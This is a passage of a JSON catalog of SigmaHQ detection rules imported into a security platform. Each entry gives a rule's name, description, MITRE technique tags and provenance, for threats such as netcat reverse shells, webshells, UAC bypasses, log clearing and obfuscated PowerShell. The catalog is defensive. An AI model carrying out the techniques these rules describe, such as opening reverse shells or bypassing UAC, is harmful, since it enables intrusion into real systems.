"sigmahq-sigma-7f3a9c2d-4e8b-4a7f-9d3e-5c6f8a9b2e1d", "type": "detection", "name": "OpenEDR Spawning Command Shell", "description": "Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities.\nThis may indicate remote command execution through OpenEDR's remote management features, which could be legitimate administrative activity or potential abuse of the remote access tool.\nThreat actors may leverage OpenEDR's remote shell capabilities to execute commands on compromised systems, facilitating lateral movement or other command-and-control operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1021.004", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/openedr-spawning-command-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f3a9c2d-4e8b-4a7f-9d3e-5c6f8a9b2e1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_comodo_ssh_shellhost_cmd_spawn.yml" } }, { "id": "sigmahq-sigma-7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "type": "detection", "name": "Execute From Alternate Data Streams", "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-from-alternate-data-streams.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml" } }, { "id": "sigmahq-sigma-7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2", "type": "detection", "name": "Registry Tampering by Potentially Suspicious Processes", "description": "Detects suspicious registry modifications made by potentially suspicious processes, such as script engine processes (WScript, CScript, etc.).\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-tampering-by-potentially-suspicious-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_process_registry_modification.yml" } }, { "id": "sigmahq-sigma-7f5d1c9a-3e83-48df-95a7-2b98aae6c13c", "type": "detection", "name": "Potential Provlaunch.EXE Binary Proxy Execution Abuse", "description": "Detects child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-provlaunch-exe-binary-proxy-execution-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f5d1c9a-3e83-48df-95a7-2b98aae6c13c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml" } }, { "id": "sigmahq-sigma-7f734ed0-4f47-46c0-837f-6ee62505abd9", "type": "detection", "name": "Potential Netcat Reverse Shell Execution", "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. 
This could be a sign of a potential reverse shell setup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-netcat-reverse-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f734ed0-4f47-46c0-837f-6ee62505abd9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml" } }, { "id": "sigmahq-sigma-7f741dcf-fc22-4759-87b4-9ae8376676a2", "type": "detection", "name": "Bypass UAC via Fodhelper.exe", "description": "Identifies use of Fodhelper.exe to bypass User Account Control. 
Adversaries use this technique to execute privileged processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-via-fodhelper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" } }, { "id": "sigmahq-sigma-7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "type": "detection", "name": "Remote Schedule Task Recon via ITaskSchedulerService", "description": "Detects remote RPC calls to read information about scheduled tasks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-recon-via-itaskschedulerservice.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" } }, { "id": "sigmahq-sigma-7fd164ba-126a-4d9c-9392-0d4f7c243df0", "type": 
"detection", "name": "OneNote Attachment File Dropped In Suspicious Location", "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onenote-attachment-file-dropped-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml" } }, { "id": "sigmahq-sigma-7ff9db12-1b94-4a79-ba68-a2402c5d6729", "type": "detection", "name": "Windows Webshell Strings", "description": "Detects common commands used in Windows webshells", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-webshell-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/web/webserver_generic/web_win_webshells_in_access_logs.yml" } }, { "id": "sigmahq-sigma-7fff6773-2baa-46de-a24a-b6eec1aba2d1", "type": "detection", "name": "UAC Bypass Using NTFS Reparse Point - File", "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ntfs-reparse-point-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" } }, { "id": "sigmahq-sigma-801bd44f-ceed-4eb6-887c-11544633c0aa", "type": "detection", "name": "Windows Defender Configuration Changes", "description": "Detects suspicious changes to the Windows Defender configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-configuration-changes.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "801bd44f-ceed-4eb6-887c-11544633c0aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" } }, { "id": "sigmahq-sigma-8023f872-3f1d-4301-a384-801889917ab4", "type": "detection", "name": "Usage of Renamed Sysinternals Tools - RegistrySet", "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usage-of-renamed-sysinternals-tools-registryset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8023f872-3f1d-4301-a384-801889917ab4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" } }, { "id": "sigmahq-sigma-8028c2c3-e25a-46e3-827f-bbb5abf181d7", "type": "detection", "name": "WMImplant Hack Tool", "description": "Detects parameters used by WMImplant", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmimplant-hack-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" } }, { "id": "sigmahq-sigma-805c55d9-31e6-4846-9878-c34c75054fe9", "type": "detection", "name": "Octopus Scanner Malware", "description": "Detects Octopus Scanner Malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195", "T1195.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/octopus-scanner-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "805c55d9-31e6-4846-9878-c34c75054fe9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" } }, { "id": "sigmahq-sigma-808146b2-9332-4d78-9416-d7e47012d83d", "type": "detection", "name": "BPFDoor Abnormal Process ID or Lock File Accessed", "description": "Detects access to BPFDoor .lock and .pid files in the temporary file storage facility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bpfdoor-abnormal-process-id-or-lock-file-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "808146b2-9332-4d78-9416-d7e47012d83d", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_bpfdoor_file_accessed.yml" } }, { "id": "sigmahq-sigma-80915f59-9b56-4616-9de0-fd0dea6c12fe", "type": "detection", "name": "Linux Logs Clearing Attempts", "description": "Detects logs clearing attempts on Linux systems via utilities such as 'rm', 'rmdir', 'shred', and 'unlink' targeting log files and directories.\nAdversaries often try to clear logs to cover their tracks after performing malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-logs-clearing-attempts.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80915f59-9b56-4616-9de0-fd0dea6c12fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" } }, { "id": "sigmahq-sigma-80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - Security", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" } }, { "id": "sigmahq-sigma-80e1f67a-4596-4351-98f5-a9c3efabac95", "type": "detection", "name": "Suspicious Scheduled Task Write to System32 Tasks", "description": "Detects the creation of tasks from processes executed from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-write-to-system32-tasks.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_task_write.yml" } }, { "id": "sigmahq-sigma-80eeab92-0979-4152-942d-96749e11df40", "type": "detection", "name": "Azure Keyvault Key Modified or Deleted", "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-keyvault-key-modified-or-deleted.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80eeab92-0979-4152-942d-96749e11df40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-80fc36aa-945e-4181-89f2-2f907ab6775d", "type": "detection", "name": "UAC Bypass Using IEInstal - Process", "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ieinstal-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" } }, { "id": "sigmahq-sigma-811e0002-b13b-4a15-9d00-a613fce66e42", "type": "detection", "name": "PUA - Process Hacker Execution", "description": "Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).\nProcess Hacker is a tool to view and manipulate processes, kernel options and other low level options.\nThreat actors abused older vulnerable versions to manipulate system processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1622", "T1564", "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-process-hacker-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "811e0002-b13b-4a15-9d00-a613fce66e42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml" } }, { "id": "sigmahq-sigma-811f459f-9231-45d4-959a-0266c6311987", "type": "detection", "name": "Suspicious Child Process Of BgInfo.EXE", "description": "Detects suspicious child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-bginfo-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "811f459f-9231-45d4-959a-0266c6311987", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml" } }, { "id": "sigmahq-sigma-81315b50-6b60-4d8f-9928-3466e1022515", "type": "detection", "name": "Desktop.INI Created by 
Uncommon Process", "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/desktop-ini-created-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81315b50-6b60-4d8f-9928-3466e1022515", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_desktop_ini_created_by_uncommon_process.yml" } }, { "id": "sigmahq-sigma-81325ce1-be01-4250-944f-b4789644556f", "type": "detection", "name": "Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE", "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/schedule-task-creation-from-env-variable-or-potentially-suspicious-path-via-scht.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81325ce1-be01-4250-944f-b4789644556f", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml" } }, { "id": "sigmahq-sigma-814c95cc-8192-4378-a70a-f1aafd877af1", "type": "detection", "name": "Use of OpenConsole", "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-openconsole.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "814c95cc-8192-4378-a70a-f1aafd877af1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" } }, { "id": "sigmahq-sigma-814ddeca-3d31-4265-8e07-8cc54fb44903", "type": "detection", "name": "LiveKD Kernel Memory Dump File Created", "description": "Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/livekd-kernel-memory-dump-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "814ddeca-3d31-4265-8e07-8cc54fb44903", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml" } }, { "id": "sigmahq-sigma-8150732a-0c9d-4a99-82b9-9efb9b90c40c", "type": "detection", "name": "Suspicious Msiexec Quiet Install From Remote Location", "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msiexec-quiet-install-from-remote-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" } }, { "id": "sigmahq-sigma-815bfc17-7fc6-4908-a55e-2f37b98cedb4", "type": "detection", "name": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-groups-or-users-enumeration-using-powershell-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" } }, { "id": "sigmahq-sigma-815cd91b-7dbc-4247-841a-d7dd1392b0a8", "type": "detection", "name": "Sysmon Configuration Error", "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_config_modification_error.yml" } }, { "id": "sigmahq-sigma-817f252c-5143-4dae-b418-48c3e9f63728", "type": "detection", "name": "Windows Recall Feature Enabled Via Reg.EXE", "description": "Detects the enabling of the Windows Recall feature via 
registry manipulation.\nWindows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" value, or setting it to 0.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recall-feature-enabled-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "817f252c-5143-4dae-b418-48c3e9f63728", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml" } }, { "id": "sigmahq-sigma-818f7b24-0fba-4c49-a073-8b755573b9c7", "type": "detection", "name": "Linux Webshell Indicators", "description": "Detects suspicious sub processes of web server processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 